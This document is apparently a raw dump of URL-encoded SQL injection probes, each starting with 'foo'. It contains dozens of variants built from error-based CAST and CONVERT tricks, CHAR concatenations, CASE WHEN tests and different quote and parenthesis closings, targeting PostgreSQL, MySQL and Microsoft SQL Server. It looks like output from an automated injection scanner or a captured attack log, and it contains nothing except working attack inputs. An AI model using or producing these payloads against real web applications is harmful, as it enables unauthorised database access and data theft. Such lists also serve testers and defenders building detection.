foo%27%20%2B%20%28SELECT%20%27Wxir%27%20WHERE%202100%3D2100%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%204253%3DCAST%28CHR%2858%29%7C%7CCHR%28118%29%7C%7CCHR%28118%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%284253%3D4253%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28116%29%7C%7CCHR%28113%29%7C%7CCHR%28119%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%23 foo%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%22%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%284244%3D4244 foo%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%282820%3D2820 foo%29%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%286866%3D6866 foo%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27NOXB%27%3D%27NOXB foo%27%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27tVjB%27%3D%27tVjB foo%27%29%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27vbPy%27%3D%27vbPy foo%27%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27CHTS%27%3D%27CHTS foo%27%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27aLIn%27%20LIKE%20%27aLIn foo%27%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27fwrT%27%20LIKE%20%27fwrT foo%27%29%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27WsVw%27%20LIKE%20%27WsVw foo%27%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27PfyJ%27%20LIKE%20%27PfyJ foo%22%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22ghWC%22%3D%22ghWC foo%22%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22zZFc%22%3D%22zZFc foo%22%29%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22UPqU%22%3D%22UPqU foo%22%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22Wrcp%22%3D%22Wrcp foo%22%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22xqHk%22%20LIKE%20%22xqHk foo%22%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22XHWm%22%20LIKE%20%22XHWm foo%22%29%29%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22YvKY%22%20LIKE%20%22YvKY foo%22%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22DyJo%22%20LIKE%20%22DyJo foo%29%20WHERE%208788%3D8788%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20WHERE%208422%3D8422%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20WHERE%202546%3D2546%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%22%20WHERE%201705%3D1705%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20%7C%7C%20%28SELECT%206743%20FROM%20DUAL%20WHERE%202279%3D2279%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%27%20%7C%7C%20%28SELECT%204137%20WHERE%206160%3D6160%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 foo%20%2B%20%28SELECT%206102%20FROM%20DUAL%20WHERE%208521%3D8521%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29 foo%20%2B%20%28SELECT%207640%20WHERE%202497%3D2497%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29 foo%27%20%2B%20%28SELECT%20%27dNFi%27%20FROM%20DUAL%20WHERE%208314%3D8314%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20%2B%20%28SELECT%20%27ZPeY%27%20WHERE%206114%3D6114%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 foo%27%20IN%20BOOLEAN%20MODE%29%20AND%203787%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283787%3D3787%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20%23 foo%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%22%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%281433%3D1433 foo%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%281116%3D1116 foo%29%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%289142%3D9142 foo%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29 foo%27%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27hezc%27%3D%27hezc foo%27%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27YjfM%27%3D%27YjfM foo%27%29%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27Lmyp%27%3D%27Lmyp foo%27%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27Fteg%27%3D%27Fteg foo%27%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%27uBkA%27%20LIKE%20%27uBkA foo%27%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27TUwB%27%20LIKE%20%27TUwB foo%27%29%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27pCSy%27%20LIKE%20%27pCSy foo%27%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%27bbfb%27%20LIKE%20%27bbfb foo%22%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22EgKT%22%3D%22EgKT foo%22%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22YSQr%22%3D%22YSQr foo%22%29%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22TmsV%22%3D%22TmsV foo%22%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%22uKYU%22%3D%22uKYU foo%22%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%22GZrG%22%20LIKE%20%22GZrG foo%22%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22lpnD%22%20LIKE%20%22lpnD foo%22%29%29%29%20AND%202192%20IN%20%28%28CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28118%29%2BCHAR%28105%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%282192%3D2192%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28116%29%2BCHAR%28113%29%2BCHAR%28119%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22khjU%22%20LIKE%20%22khjU 